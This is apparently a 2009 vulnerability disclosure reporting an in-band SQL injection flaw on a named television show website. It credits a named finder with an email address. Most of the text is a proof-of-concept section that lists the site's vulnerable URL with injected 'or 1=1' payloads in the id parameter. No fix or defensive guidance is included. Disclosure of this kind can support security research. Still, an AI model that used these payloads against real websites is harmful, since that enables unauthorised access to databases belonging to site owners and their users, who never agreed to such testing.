==================================================================== Website: http://biggboss2.in.com/ Category: TV Show Vulnerability: Inband SQL Injection Founder: Jaydeep Dave[jaydipdave@gmail.com] Date: 16th Feb, 2009 ==================================================================== == P O C =========================================================== URL: http://biggboss2.in.com/contestants.php?msgvote=0&id=10 Vulnerable URL: http://biggboss2.in.com/contestants.php?msgvote=0&id=10 or 1=1 http://biggboss2.in.com/contestants.php?msgvote=0&id=-10 or 1=1 ====================================================================